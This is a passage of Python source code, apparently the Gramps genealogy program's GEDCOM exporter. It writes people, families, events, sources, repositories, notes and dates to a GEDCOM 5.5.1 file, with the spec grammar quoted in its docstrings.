self.dbase = option_box.get_filtered_database(self.dbase, self)
def write_gedcom_file(self, filename):
"""
Write the actual GEDCOM file to the specified filename.
"""
self.dirname = os.path.dirname(filename)
with open(filename, "w", encoding='utf-8') as self.gedcom_file:
person_len = self.dbase.get_number_of_people()
family_len = self.dbase.get_number_of_families()
source_len = self.dbase.get_number_of_sources()
repo_len = self.dbase.get_number_of_repositories()
note_len = self.dbase.get_number_of_notes() / NOTES_PER_PERSON
total_steps = (person_len + family_len + source_len + repo_len +
note_len)
self.set_total(total_steps)
self._header(filename)
self._submitter()
self._individuals()
self._families()
self._sources()
self._repos()
self._notes()
self._writeln(0, "TRLR")
return True
def _writeln(self, level, token, textlines="", limit=72):
"""
Write a line of text to the output file in the form of:
LEVEL TOKEN text
If the line contains newlines, it is broken into multiple lines using
the CONT token. If any line is greater than the limit, it will broken
into multiple lines using CONC.
"""
assert token
if textlines:
# break the line into multiple lines if a newline is found
textlines = textlines.replace('\n\r', '\n')
textlines = textlines.replace('\r', '\n')
# Need to double '@' See Gedcom 5.5 spec 'any_char'
if not textlines.startswith('@'): # avoid xrefs
textlines = textlines.replace('@', '@@')
textlist = textlines.split('\n')
token_level = level
for text in textlist:
                # make it unicode so that breakup below does the right thing.
text = str(text)
if limit:
prefix = "\n%d CONC " % (level + 1)
txt = prefix.join(breakup(text, limit))
else:
txt = text
self.gedcom_file.write("%d %s %s\n" %
(token_level, token, txt))
token_level = level + 1
token = "CONT"
else:
self.gedcom_file.write("%d %s\n" % (level, token))
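    # Illustrative behaviour (not in the original source): _writeln(1, "NOTE",
    # text) with text longer than the 72-character limit emits
    #   1 NOTE <first chunk>
    #   2 CONC <remainder>
    # and each embedded newline in the text starts a "2 CONT" line instead.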
def _header(self, filename):
"""
Write the GEDCOM header.
HEADER:=
n HEAD {1:1}
+1 SOUR <APPROVED_SYSTEM_ID> {1:1}
+2 VERS <VERSION_NUMBER> {0:1}
+2 NAME <NAME_OF_PRODUCT> {0:1}
+2 CORP <NAME_OF_BUSINESS> {0:1} # Not used
+3 <<ADDRESS_STRUCTURE>> {0:1} # Not used
+2 DATA <NAME_OF_SOURCE_DATA> {0:1} # Not used
+3 DATE <PUBLICATION_DATE> {0:1} # Not used
+3 COPR <COPYRIGHT_SOURCE_DATA> {0:1} # Not used
+1 DEST <RECEIVING_SYSTEM_NAME> {0:1*} # Not used
+1 DATE <TRANSMISSION_DATE> {0:1}
+2 TIME <TIME_VALUE> {0:1}
+1 SUBM @XREF:SUBM@ {1:1}
+1 SUBN @XREF:SUBN@ {0:1}
+1 FILE <FILE_NAME> {0:1}
+1 COPR <COPYRIGHT_GEDCOM_FILE> {0:1}
+1 GEDC {1:1}
+2 VERS <VERSION_NUMBER> {1:1}
+2 FORM <GEDCOM_FORM> {1:1}
+1 CHAR <CHARACTER_SET> {1:1}
+2 VERS <VERSION_NUMBER> {0:1}
+1 LANG <LANGUAGE_OF_TEXT> {0:1}
+1 PLAC {0:1}
+2 FORM <PLACE_HIERARCHY> {1:1}
+1 NOTE <GEDCOM_CONTENT_DESCRIPTION> {0:1}
+2 [CONT|CONC] <GEDCOM_CONTENT_DESCRIPTION> {0:M}
"""
local_time = time.localtime(time.time())
(year, mon, day, hour, minutes, sec) = local_time[0:6]
date_str = "%d %s %d" % (day, libgedcom.MONTH[mon], year)
time_str = "%02d:%02d:%02d" % (hour, minutes, sec)
rname = self.dbase.get_researcher().get_name()
self._writeln(0, "HEAD")
self._writeln(1, "SOUR", "Gramps")
self._writeln(2, "VERS", VERSION)
self._writeln(2, "NAME", "Gramps")
self._writeln(1, "DATE", date_str)
self._writeln(2, "TIME", time_str)
self._writeln(1, "SUBM", "@SUBM@")
self._writeln(1, "FILE", filename, limit=255)
self._writeln(1, "COPR", 'Copyright (c) %d %s.' % (year, rname))
self._writeln(1, "GEDC")
self._writeln(2, "VERS", "5.5.1")
self._writeln(2, "FORM", 'LINEAGE-LINKED')
self._writeln(1, "CHAR", "UTF-8")
# write the language string if the current LANG variable
# matches something we know about.
lang = glocale.language[0]
if lang and len(lang) >= 2:
lang_code = LANGUAGES.get(lang[0:2])
if lang_code:
self._writeln(1, 'LANG', lang_code)
def _submitter(self):
"""
n @<XREF:SUBM>@ SUBM {1:1}
+1 NAME <SUBMITTER_NAME> {1:1}
+1 <<ADDRESS_STRUCTURE>> {0:1}
+1 <<MULTIMEDIA_LINK>> {0:M} # not used
+1 LANG <LANGUAGE_PREFERENCE> {0:3} # not used
+1 RFN <SUBMITTER_REGISTERED_RFN> {0:1} # not used
+1 RIN <AUTOMATED_RECORD_ID> {0:1} # not used
+1 <<CHANGE_DATE>> {0:1} # not used
"""
owner = self.dbase.get_researcher()
name = owner.get_name()
phon = owner.get_phone()
mail = owner.get_email()
self._writeln(0, "@SUBM@", "SUBM")
self._writeln(1, "NAME", name)
# Researcher is a sub-type of LocationBase, so get_city etc. which are
# used in __write_addr work fine. However, the database owner street is
# stored in address, so we need to temporarily copy it into street so
# __write_addr works properly
owner.set_street(owner.get_address())
self.__write_addr(1, owner)
if phon:
self._writeln(1, "PHON", phon)
if mail:
self._writeln(1, "EMAIL", mail)
def _individuals(self):
"""
Write the individual people to the gedcom file.
Since people like to have the list sorted by ID value, we need to go
through a sorting step. We need to reset the progress bar, otherwise,
people will be confused when the progress bar is idle.
"""
self.set_text(_("Writing individuals"))
phandles = self.dbase.iter_person_handles()
sorted_list = []
for handle in phandles:
person = self.dbase.get_person_from_handle(handle)
if person:
data = (person.get_gramps_id(), handle)
sorted_list.append(data)
sorted_list.sort()
for data in sorted_list:
self.update()
self._person(self.dbase.get_person_from_handle(data[1]))
def _person(self, person):
"""
Write out a single person.
n @XREF:INDI@ INDI {1:1}
+1 RESN <RESTRICTION_NOTICE> {0:1} # not used
+1 <<PERSONAL_NAME_STRUCTURE>> {0:M}
+1 SEX <SEX_VALUE> {0:1}
+1 <<INDIVIDUAL_EVENT_STRUCTURE>> {0:M}
+1 <<INDIVIDUAL_ATTRIBUTE_STRUCTURE>> {0:M}
+1 <<LDS_INDIVIDUAL_ORDINANCE>> {0:M}
+1 <<CHILD_TO_FAMILY_LINK>> {0:M}
+1 <<SPOUSE_TO_FAMILY_LINK>> {0:M}
+1 SUBM @<XREF:SUBM>@ {0:M}
+1 <<ASSOCIATION_STRUCTURE>> {0:M}
+1 ALIA @<XREF:INDI>@ {0:M}
+1 ANCI @<XREF:SUBM>@ {0:M}
+1 DESI @<XREF:SUBM>@ {0:M}
+1 <<SOURCE_CITATION>> {0:M}
+1 <<MULTIMEDIA_LINK>> {0:M} ,*
+1 <<NOTE_STRUCTURE>> {0:M}
+1 RFN <PERMANENT_RECORD_FILE_NUMBER> {0:1}
+1 AFN <ANCESTRAL_FILE_NUMBER> {0:1}
+1 REFN <USER_REFERENCE_NUMBER> {0:M}
+2 TYPE <USER_REFERENCE_TYPE> {0:1}
+1 RIN <AUTOMATED_RECORD_ID> {0:1}
+1 <<CHANGE_DATE>> {0:1}
"""
if person is None:
return
self._writeln(0, "@%s@" % person.get_gramps_id(), "INDI")
self._names(person)
self._gender(person)
self._person_event_ref('BIRT', person.get_birth_ref())
self._person_event_ref('DEAT', person.get_death_ref())
self._remaining_events(person)
self._attributes(person)
self._lds_ords(person, 1)
self._child_families(person)
self._parent_families(person)
self._assoc(person, 1)
self._person_sources(person)
self._addresses(person)
self._photos(person.get_media_list(), 1)
self._url_list(person, 1)
self._note_references(person.get_note_list(), 1)
self._change(person.get_change_time(), 1)
def _assoc(self, person, level):
"""
n ASSO @<XREF:INDI>@ {0:M}
+1 RELA <RELATION_IS_DESCRIPTOR> {1:1}
+1 <<NOTE_STRUCTURE>> {0:M}
+1 <<SOURCE_CITATION>> {0:M}
"""
for ref in person.get_person_ref_list():
person = self.dbase.get_person_from_handle(ref.ref)
if person:
self._writeln(level, "ASSO", "@%s@" % person.get_gramps_id())
self._writeln(level + 1, "RELA", ref.get_relation())
self._note_references(ref.get_note_list(), level + 1)
self._source_references(ref.get_citation_list(), level + 1)
def _note_references(self, notelist, level):
"""
Write out the list of note handles to the current level.
We use the Gramps ID as the XREF for the GEDCOM file.
"""
for note_handle in notelist:
note = self.dbase.get_note_from_handle(note_handle)
if note:
self._writeln(level, 'NOTE', '@%s@' % note.get_gramps_id())
def _names(self, person):
"""
Write the names associated with the person to the current level.
Since nicknames in version < 3.3 are separate from the name structure,
we search the attribute list to see if we can find a nickname.
Because we do not know the mappings, we just take the first nickname
we find, and add it to the primary name.
        If a nickname is present in the name structure, it has precedence.
"""
nicknames = [attr.get_value() for attr in person.get_attribute_list()
if int(attr.get_type()) == AttributeType.NICKNAME]
if len(nicknames) > 0:
nickname = nicknames[0]
else:
nickname = ""
self._person_name(person.get_primary_name(), nickname)
for name in person.get_alternate_names():
self._person_name(name, "")
def _gender(self, person):
"""
Write out the gender of the person to the file.
If the gender is not male or female, simply do not output anything.
        The only valid values are M (male) or F (female). So if the gender is
unknown, we output nothing.
"""
if person.get_gender() == Person.MALE:
self._writeln(1, "SEX", "M")
elif person.get_gender() == Person.FEMALE:
self._writeln(1, "SEX", "F")
def _lds_ords(self, obj, level):
"""
Simply loop through the list of LDS ordinances, and call the function
that writes the LDS ordinance structure.
"""
for lds_ord in obj.get_lds_ord_list():
self.write_ord(lds_ord, level)
def _remaining_events(self, person):
"""
Output all events associated with the person that are not BIRTH or
DEATH events.
Because all we have are event references, we have to
extract the real event to discover the event type.
"""
global adop_written
# adop_written is only shared between this function and
# _process_person_event. This is rather ugly code, but it is difficult
# to support an Adoption event without an Adopted relationship from the
# parent(s), an Adopted relationship from the parent(s) without an
# event, and both an event and a relationship. All these need to be
# supported without duplicating the output of the ADOP GEDCOM tag. See
# bug report 2370.
adop_written = False
for event_ref in person.get_event_ref_list():
event = self.dbase.get_event_from_handle(event_ref.ref)
if not event:
continue
self._process_person_event(person, event, event_ref)
if not adop_written:
self._adoption_records(person, adop_written)
def _process_person_event(self, person, event, event_ref):
"""
Process a person event, which is not a BIRTH or DEATH event.
"""
global adop_written
etype = int(event.get_type())
# if the event is a birth or death, skip it.
if etype in (EventType.BIRTH, EventType.DEATH):
return
role = int(event_ref.get_role())
# if the event role is not primary, skip the event.
if role != EventRoleType.PRIMARY:
return
val = libgedcom.PERSONALCONSTANTEVENTS.get(etype, "").strip()
if val and val.strip():
if val in NEEDS_PARAMETER:
if event.get_description().strip():
self._writeln(1, val, event.get_description())
else:
self._writeln(1, val)
else:
if event_has_subordinate_data(event, event_ref):
self._writeln(1, val)
else:
self._writeln(1, val, 'Y')
if event.get_description().strip():
self._writeln(2, 'TYPE', event.get_description())
else:
descr = event.get_description()
if descr:
self._writeln(1, 'EVEN', descr)
else:
self._writeln(1, 'EVEN')
if val.strip():
self._writeln(2, 'TYPE', val)
else:
self._writeln(2, 'TYPE', str(event.get_type()))
self._dump_event_stats(event, event_ref)
if etype == EventType.ADOPT and not adop_written:
adop_written = True
self._adoption_records(person, adop_written)
def _adoption_records(self, person, adop_written):
"""
Write Adoption events for each child that has been adopted.
n ADOP
+1 <<INDIVIDUAL_EVENT_DETAIL>>
+1 FAMC @<XREF:FAM>@
+2 ADOP <ADOPTED_BY_WHICH_PARENT>
"""
adoptions = []
for family in [self.dbase.get_family_from_handle(fh)
for fh in person.get_parent_family_handle_list()]:
if family is None:
continue
for child_ref in [ref for ref in family.get_child_ref_list()
if ref.ref == person.handle]:
if child_ref.mrel == ChildRefType.ADOPTED \
or child_ref.frel == ChildRefType.ADOPTED:
adoptions.append((family, child_ref.frel, child_ref.mrel))
for (fam, frel, mrel) in adoptions:
if not adop_written:
self._writeln(1, 'ADOP', 'Y')
self._writeln(2, 'FAMC', '@%s@' % fam.get_gramps_id())
if mrel == frel:
self._writeln(3, 'ADOP', 'BOTH')
elif mrel == ChildRefType.ADOPTED:
self._writeln(3, 'ADOP', 'WIFE')
else:
self._writeln(3, 'ADOP', 'HUSB')
def _attributes(self, person):
"""
Write out the attributes to the GEDCOM file.
Since we have already looked at nicknames when we generated the names,
we filter them out here.
We use the GEDCOM 5.5.1 FACT command to write out attributes not
built in to GEDCOM.
"""
# filter out the nicknames
attr_list = [attr for attr in person.get_attribute_list()
if attr.get_type() != AttributeType.NICKNAME]
for attr in attr_list:
attr_type = int(attr.get_type())
name = libgedcom.PERSONALCONSTANTATTRIBUTES.get(attr_type)
key = str(attr.get_type())
value = attr.get_value().strip().replace('\r', ' ')
if key in ("AFN", "RFN", "REFN", "_UID", "_FSFTID"):
self._writeln(1, key, value)
continue
if key == "RESN":
self._writeln(1, 'RESN')
continue
if name and name.strip():
self._writeln(1, name, value)
elif value:
self._writeln(1, 'FACT', value)
self._writeln(2, 'TYPE', key)
else:
continue
self._note_references(attr.get_note_list(), 2)
self._source_references(attr.get_citation_list(), 2)
def _source_references(self, citation_list, level):
"""
Loop through the list of citation handles, writing the information
to the file.
"""
for citation_handle in citation_list:
self._source_ref_record(level, citation_handle)
def _addresses(self, person):
"""
Write out the addresses associated with the person as RESI events.
"""
for addr in person.get_address_list():
self._writeln(1, 'RESI')
self._date(2, addr.get_date_object())
self.__write_addr(2, addr)
if addr.get_phone():
self._writeln(2, 'PHON', addr.get_phone())
self._note_references(addr.get_note_list(), 2)
self._source_references(addr.get_citation_list(), 2)
def _photos(self, media_list, level):
"""
Loop through the list of media objects, writing the information
to the file.
"""
for photo in media_list:
self._photo(photo, level)
def _child_families(self, person):
"""
Write the Gramps ID as the XREF for each family in which the person
is listed as a child.
"""
        # get the list of families from the handle list
family_list = [self.dbase.get_family_from_handle(hndl)
for hndl in person.get_parent_family_handle_list()]
for family in family_list:
if family:
self._writeln(1, 'FAMC', '@%s@' % family.get_gramps_id())
for child in family.get_child_ref_list():
if child.get_reference_handle() == person.get_handle():
if child.frel == ChildRefType.ADOPTED and \
child.mrel == ChildRefType.ADOPTED:
self._writeln(2, 'PEDI adopted')
elif child.frel == ChildRefType.BIRTH and \
child.mrel == ChildRefType.BIRTH:
self._writeln(2, 'PEDI birth')
elif child.frel == ChildRefType.STEPCHILD and \
child.mrel == ChildRefType.STEPCHILD:
self._writeln(2, 'PEDI stepchild')
elif child.frel == ChildRefType.FOSTER and \
child.mrel == ChildRefType.FOSTER:
self._writeln(2, 'PEDI foster')
elif child.frel == child.mrel:
self._writeln(2, 'PEDI Unknown')
else:
self._writeln(2, '_FREL %s' %
PEDIGREE_TYPES.get(child.frel.value,
"Unknown"))
self._writeln(2, '_MREL %s' %
PEDIGREE_TYPES.get(child.mrel.value,
"Unknown"))
def _parent_families(self, person):
"""
Write the Gramps ID as the XREF for each family in which the person
is listed as a parent.
"""
        # get the list of families from the handle list
family_list = [self.dbase.get_family_from_handle(hndl)
for hndl in person.get_family_handle_list()]
for family in family_list:
if family:
self._writeln(1, 'FAMS', '@%s@' % family.get_gramps_id())
def _person_sources(self, person):
"""
Loop through the list of citations, writing the information
to the file.
"""
for citation_handle in person.get_citation_list():
self._source_ref_record(1, citation_handle)
def _url_list(self, obj, level):
"""
For Person's FAX, PHON, EMAIL, WWW lines;
n PHON <PHONE_NUMBER> {0:3}
n EMAIL <ADDRESS_EMAIL> {0:3}
n FAX <ADDRESS_FAX> {0:3}
n WWW <ADDRESS_WEB_PAGE> {0:3}
n OBJE {1:1}
+1 FORM <MULTIMEDIA_FORMAT> {1:1}
+1 TITL <DESCRIPTIVE_TITLE> {0:1}
+1 FILE <MULTIMEDIA_FILE_REFERENCE> {1:1}
+1 <<NOTE_STRUCTURE>> {0:M}
"""
for url in obj.get_url_list():
if url.get_type() == UrlType.EMAIL:
self._writeln(level, 'EMAIL', url.get_path())
elif url.get_type() == UrlType.WEB_HOME:
self._writeln(level, 'WWW', url.get_path())
elif url.get_type() == _('Phone'):
self._writeln(level, 'PHON', url.get_path())
elif url.get_type() == _('FAX'):
self._writeln(level, 'FAX', url.get_path())
else:
self._writeln(level, 'OBJE')
self._writeln(level + 1, 'FORM', 'URL')
if url.get_description():
self._writeln(level + 1, 'TITL', url.get_description())
if url.get_path():
self._writeln(level + 1, 'FILE', url.get_path(), limit=255)
def _families(self):
"""
Write out the list of families, sorting by Gramps ID.
"""
self.set_text(_("Writing families"))
# generate a list of (GRAMPS_ID, HANDLE) pairs. This list
# can then be sorted by the sort routine, which will use the
# first value of the tuple as the sort key.
sorted_list = sort_handles_by_id(self.dbase.get_family_handles(),
self.dbase.get_family_from_handle)
        # loop through the sorted list, pulling out the handle. This list
# has already been sorted by GRAMPS_ID
for family_handle in [hndl[1] for hndl in sorted_list]:
self.update()
self._family(self.dbase.get_family_from_handle(family_handle))
def _family(self, family):
"""
n @<XREF:FAM>@ FAM {1:1}
        +1 RESN <RESTRICTION_NOTICE>  {0:1}
+1 <<FAMILY_EVENT_STRUCTURE>> {0:M}
+1 HUSB @<XREF:INDI>@ {0:1}
+1 WIFE @<XREF:INDI>@ {0:1}
+1 CHIL @<XREF:INDI>@ {0:M}
+1 NCHI <COUNT_OF_CHILDREN> {0:1}
+1 SUBM @<XREF:SUBM>@ {0:M}
+1 <<LDS_SPOUSE_SEALING>> {0:M}
+1 REFN <USER_REFERENCE_NUMBER> {0:M}
"""
if family is None:
return
gramps_id = family.get_gramps_id()
self._writeln(0, '@%s@' % gramps_id, 'FAM')
self._family_reference('HUSB', family.get_father_handle())
self._family_reference('WIFE', family.get_mother_handle())
self._lds_ords(family, 1)
self._family_events(family)
self._family_attributes(family.get_attribute_list(), 1)
self._family_child_list(family.get_child_ref_list())
self._source_references(family.get_citation_list(), 1)
self._photos(family.get_media_list(), 1)
self._note_references(family.get_note_list(), 1)
self._change(family.get_change_time(), 1)
def _family_child_list(self, child_ref_list):
"""
Write the child XREF values to the GEDCOM file.
"""
child_list = [
self.dbase.get_person_from_handle(cref.ref).get_gramps_id()
for cref in child_ref_list]
for gid in child_list:
if gid is None:
continue
self._writeln(1, 'CHIL', '@%s@' % gid)
def _family_reference(self, token, person_handle):
"""
Write the family reference to the file.
This is either 'WIFE' or 'HUSB'. As usual, we use the Gramps ID as the
XREF value.
"""
if person_handle:
person = self.dbase.get_person_from_handle(person_handle)
if person:
self._writeln(1, token, '@%s@' % person.get_gramps_id())
def _family_events(self, family):
"""
Output the events associated with the family.
Because all we have are event references, we have to extract the real
event to discover the event type.
"""
for event_ref in family.get_event_ref_list():
event = self.dbase.get_event_from_handle(event_ref.ref)
if event is None:
continue
self._process_family_event(event, event_ref)
self._dump_event_stats(event, event_ref)
def _process_family_event(self, event, event_ref):
"""
Process a single family event.
"""
etype = int(event.get_type())
val = libgedcom.FAMILYCONSTANTEVENTS.get(etype)
if val:
if event_has_subordinate_data(event, event_ref):
self._writeln(1, val)
else:
self._writeln(1, val, 'Y')
if event.get_type() == EventType.MARRIAGE:
self._family_event_attrs(event.get_attribute_list(), 2)
if event.get_description().strip() != "":
self._writeln(2, 'TYPE', event.get_description())
else:
descr = event.get_description()
if descr:
self._writeln(1, 'EVEN', descr)
else:
self._writeln(1, 'EVEN')
the_type = str(event.get_type())
if the_type:
self._writeln(2, 'TYPE', the_type)
def _family_event_attrs(self, attr_list, level):
"""
Write the attributes associated with the family event.
The only ones we really care about are FATHER_AGE and MOTHER_AGE which
we translate to WIFE/HUSB AGE attributes.
"""
for attr in attr_list:
if attr.get_type() == AttributeType.FATHER_AGE:
self._writeln(level, 'HUSB')
self._writeln(level + 1, 'AGE', attr.get_value())
elif attr.get_type() == AttributeType.MOTHER_AGE:
self._writeln(level, 'WIFE')
self._writeln(level + 1, 'AGE', attr.get_value())
def _family_attributes(self, attr_list, level):
"""
Write out the attributes associated with a family to the GEDCOM file.
Since we have already looked at nicknames when we generated the names,
we filter them out here.
We use the GEDCOM 5.5.1 FACT command to write out attributes not
built in to GEDCOM.
"""
for attr in attr_list:
attr_type = int(attr.get_type())
name = libgedcom.FAMILYCONSTANTATTRIBUTES.get(attr_type)
key = str(attr.get_type())
value = attr.get_value().replace('\r', ' ')
if key in ("AFN", "RFN", "REFN", "_UID"):
self._writeln(1, key, value)
continue
if name and name.strip():
self._writeln(1, name, value)
continue
else:
self._writeln(1, 'FACT', value)
self._writeln(2, 'TYPE', key)
self._note_references(attr.get_note_list(), level + 1)
self._source_references(attr.get_citation_list(),
level + 1)
def _sources(self):
"""
Write out the list of sources, sorting by Gramps ID.
"""
self.set_text(_("Writing sources"))
sorted_list = sort_handles_by_id(self.dbase.get_source_handles(),
self.dbase.get_source_from_handle)
for (source_id, handle) in sorted_list:
self.update()
source = self.dbase.get_source_from_handle(handle)
if source is None:
continue
self._writeln(0, '@%s@' % source_id, 'SOUR')
if source.get_title():
self._writeln(1, 'TITL', source.get_title())
if source.get_author():
self._writeln(1, "AUTH", source.get_author())
if source.get_publication_info():
self._writeln(1, "PUBL", source.get_publication_info())
if source.get_abbreviation():
self._writeln(1, 'ABBR', source.get_abbreviation())
self._photos(source.get_media_list(), 1)
for reporef in source.get_reporef_list():
self._reporef(reporef, 1)
# break
self._note_references(source.get_note_list(), 1)
self._change(source.get_change_time(), 1)
def _notes(self):
"""
Write out the list of notes, sorting by Gramps ID.
"""
self.set_text(_("Writing notes"))
note_cnt = 0
sorted_list = sort_handles_by_id(self.dbase.get_note_handles(),
self.dbase.get_note_from_handle)
for note_handle in [hndl[1] for hndl in sorted_list]:
# the following makes the progress bar a bit smoother
if not note_cnt % NOTES_PER_PERSON:
self.update()
note_cnt += 1
note = self.dbase.get_note_from_handle(note_handle)
if note is None:
continue
self._note_record(note)
def _note_record(self, note):
"""
n @<XREF:NOTE>@ NOTE <SUBMITTER_TEXT> {1:1}
+1 [ CONC | CONT] <SUBMITTER_TEXT> {0:M}
+1 <<SOURCE_CITATION>> {0:M}
+1 REFN <USER_REFERENCE_NUMBER> {0:M}
+2 TYPE <USER_REFERENCE_TYPE> {0:1}
+1 RIN <AUTOMATED_RECORD_ID> {0:1}
+1 <<CHANGE_DATE>> {0:1}
"""
if note:
self._writeln(0, '@%s@' % note.get_gramps_id(),
'NOTE ' + note.get())
def _repos(self):
"""
Write out the list of repositories, sorting by Gramps ID.
REPOSITORY_RECORD:=
n @<XREF:REPO>@ REPO {1:1}
+1 NAME <NAME_OF_REPOSITORY> {1:1}
+1 <<ADDRESS_STRUCTURE>> {0:1}
+1 <<NOTE_STRUCTURE>> {0:M}
+1 REFN <USER_REFERENCE_NUMBER> {0:M}
+2 TYPE <USER_REFERENCE_TYPE> {0:1}
+1 RIN <AUTOMATED_RECORD_ID> {0:1}
+1 <<CHANGE_DATE>> {0:1}
"""
self.set_text(_("Writing repositories"))
sorted_list = sort_handles_by_id(self.dbase.get_repository_handles(),
self.dbase.get_repository_from_handle)
# GEDCOM only allows for a single repository per source
for (repo_id, handle) in sorted_list:
self.update()
repo = self.dbase.get_repository_from_handle(handle)
if repo is None:
continue
self._writeln(0, '@%s@' % repo_id, 'REPO')
if repo.get_name():
self._writeln(1, 'NAME', repo.get_name())
for addr in repo.get_address_list():
self.__write_addr(1, addr)
if addr.get_phone():
self._writeln(1, 'PHON', addr.get_phone())
for url in repo.get_url_list():
if url.get_type() == UrlType.EMAIL:
self._writeln(1, 'EMAIL', url.get_path())
elif url.get_type() == UrlType.WEB_HOME:
self._writeln(1, 'WWW', url.get_path())
elif url.get_type() == _('FAX'):
self._writeln(1, 'FAX', url.get_path())
self._note_references(repo.get_note_list(), 1)
def _reporef(self, reporef, level):
"""
n REPO [ @XREF:REPO@ | <NULL>] {1:1}
+1 <<NOTE_STRUCTURE>> {0:M}
+1 CALN <SOURCE_CALL_NUMBER> {0:M}
+2 MEDI <SOURCE_MEDIA_TYPE> {0:1}
"""
if reporef.ref is None:
return
repo = self.dbase.get_repository_from_handle(reporef.ref)
if repo is None:
return
repo_id = repo.get_gramps_id()
self._writeln(level, 'REPO', '@%s@' % repo_id)
self._note_references(reporef.get_note_list(), level + 1)
if reporef.get_call_number():
self._writeln(level + 1, 'CALN', reporef.get_call_number())
if reporef.get_media_type():
self._writeln(level + 2, 'MEDI', str(reporef.get_media_type()))
def _person_event_ref(self, key, event_ref):
"""
Write out the BIRTH and DEATH events for the person.
"""
if event_ref:
event = self.dbase.get_event_from_handle(event_ref.ref)
if event_has_subordinate_data(event, event_ref):
self._writeln(1, key)
else:
self._writeln(1, key, 'Y')
if event.get_description().strip() != "":
self._writeln(2, 'TYPE', event.get_description())
self._dump_event_stats(event, event_ref)
def _change(self, timeval, level):
"""
CHANGE_DATE:=
n CHAN {1:1}
+1 DATE <CHANGE_DATE> {1:1}
+2 TIME <TIME_VALUE> {0:1}
+1 <<NOTE_STRUCTURE>> # not used
"""
self._writeln(level, 'CHAN')
time_val = time.gmtime(timeval)
self._writeln(level + 1, 'DATE', '%d %s %d' % (
time_val[2], libgedcom.MONTH[time_val[1]], time_val[0]))
self._writeln(level + 2, 'TIME', '%02d:%02d:%02d' % (
time_val[3], time_val[4], time_val[5]))
def _dump_event_stats(self, event, event_ref):
"""
Write the event details for the event, using the event and event
reference information.
GEDCOM does not make a distinction between the two.
"""
dateobj = event.get_date_object()
self._date(2, dateobj)
if self._datewritten:
# write out TIME if present
times = [attr.get_value() for attr in event.get_attribute_list()
if int(attr.get_type()) == AttributeType.TIME]
# Not legal, but inserted by PhpGedView
if len(times) > 0:
self._writeln(3, 'TIME', times[0])
place = None
if event.get_place_handle():
place = self.dbase.get_place_from_handle(event.get_place_handle())
self._place(place, dateobj, 2)
for attr in event.get_attribute_list():
attr_type = attr.get_type()
if attr_type == AttributeType.CAUSE:
self._writeln(2, 'CAUS', attr.get_value())
elif attr_type == AttributeType.AGENCY:
self._writeln(2, 'AGNC', attr.get_value())
elif attr_type == _("Phone"):
self._writeln(2, 'PHON', attr.get_value())
elif attr_type == _("FAX"):
self._writeln(2, 'FAX', attr.get_value())
elif attr_type == _("EMAIL"):
self._writeln(2, 'EMAIL', attr.get_value())
elif attr_type == _("WWW"):
self._writeln(2, 'WWW', attr.get_value())
for attr in event_ref.get_attribute_list():
attr_type = attr.get_type()
if attr_type == AttributeType.AGE:
self._writeln(2, 'AGE', attr.get_value())
elif attr_type == AttributeType.FATHER_AGE:
self._writeln(2, 'HUSB')
self._writeln(3, 'AGE', attr.get_value())
elif attr_type == AttributeType.MOTHER_AGE:
self._writeln(2, 'WIFE')
self._writeln(3, 'AGE', attr.get_value())
self._note_references(event.get_note_list(), 2)
self._source_references(event.get_citation_list(), 2)
self._photos(event.get_media_list(), 2)
if place:
self._photos(place.get_media_list(), 2)
def write_ord(self, lds_ord, index):
"""
LDS_INDIVIDUAL_ORDINANCE:=
[
n [ BAPL | CONL ] {1:1}
+1 DATE <DATE_LDS_ORD> {0:1}
+1 TEMP <TEMPLE_CODE> {0:1}
+1 PLAC <PLACE_LIVING_ORDINANCE> {0:1}
+1 STAT <LDS_BAPTISM_DATE_STATUS> {0:1}
+2 DATE <CHANGE_DATE> {1:1}
+1 <<NOTE_STRUCTURE>> {0:M}
+1 <<SOURCE_CITATION>> {0:M} p.39
|
n ENDL {1:1}
+1 DATE <DATE_LDS_ORD> {0:1}
+1 TEMP <TEMPLE_CODE> {0:1}
+1 PLAC <PLACE_LIVING_ORDINANCE> {0:1}
+1 STAT <LDS_ENDOWMENT_DATE_STATUS> {0:1}
+2 DATE <CHANGE_DATE> {1:1}
+1 <<NOTE_STRUCTURE>> {0:M}
+1 <<SOURCE_CITATION>> {0:M}
|
n SLGC {1:1}
+1 DATE <DATE_LDS_ORD> {0:1}
+1 TEMP <TEMPLE_CODE> {0:1}
+1 PLAC <PLACE_LIVING_ORDINANCE> {0:1}
+1 FAMC @<XREF:FAM>@ {1:1}
+1 STAT <LDS_CHILD_SEALING_DATE_STATUS> {0:1}
+2 DATE <CHANGE_DATE> {1:1}
+1 <<NOTE_STRUCTURE>> {0:M}
+1 <<SOURCE_CITATION>> {0:M}
]
"""
self._writeln(index, LDS_ORD_NAME[lds_ord.get_type()])
self._date(index + 1, lds_ord.get_date_object())
if lds_ord.get_family_handle():
family_handle = lds_ord.get_family_handle()
family = self.dbase.get_family_from_handle(family_handle)
if family:
self._writeln(index + 1, 'FAMC', '@%s@' %
family.get_gramps_id())
if lds_ord.get_temple():
self._writeln(index + 1, 'TEMP', lds_ord.get_temple())
if lds_ord.get_place_handle():
place = self.dbase.get_place_from_handle(
lds_ord.get_place_handle())
self._place(place, lds_ord.get_date_object(), 2)
if lds_ord.get_status() != LdsOrd.STATUS_NONE:
self._writeln(2, 'STAT', LDS_STATUS[lds_ord.get_status()])
self._note_references(lds_ord.get_note_list(), index + 1)
self._source_references(lds_ord.get_citation_list(), index + 1)
def _date(self, level, date):
"""
Write the 'DATE' GEDCOM token, along with the date in GEDCOM's
expected format.
"""
self._datewritten = True
start = date.get_start_date()
if start != Date.EMPTY:
cal = date.get_calendar()
mod = date.get_modifier()
quality = date.get_quality()
if quality in libgedcom.DATE_QUALITY:
qual_text = libgedcom.DATE_QUALITY[quality] + " "
else:
qual_text = ""
if mod == Date.MOD_SPAN:
val = "%sFROM %s TO %s" % (
qual_text,
libgedcom.make_gedcom_date(start, cal, mod, None),
libgedcom.make_gedcom_date(date.get_stop_date(),
cal, mod, None))
elif mod == Date.MOD_RANGE:
val = "%sBET %s AND %s" % (
qual_text,
libgedcom.make_gedcom_date(start, cal, mod, None),
libgedcom.make_gedcom_date(date.get_stop_date(),
cal, mod, None))
else:
val = libgedcom.make_gedcom_date(start, cal, mod, quality)
self._writeln(level, 'DATE', val)
elif date.get_text():
self._writeln(level, 'DATE', date.get_text())
else:
self._datewritten = False
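    # Illustrative only: typical lines emitted by _date() (exact text
    # comes from libgedcom.make_gedcom_date):
    #     2 DATE 12 JAN 1900               plain date
    #     2 DATE FROM 1900 TO 1910         Date.MOD_SPAN
    #     2 DATE BET 1900 AND 1910         Date.MOD_RANGE
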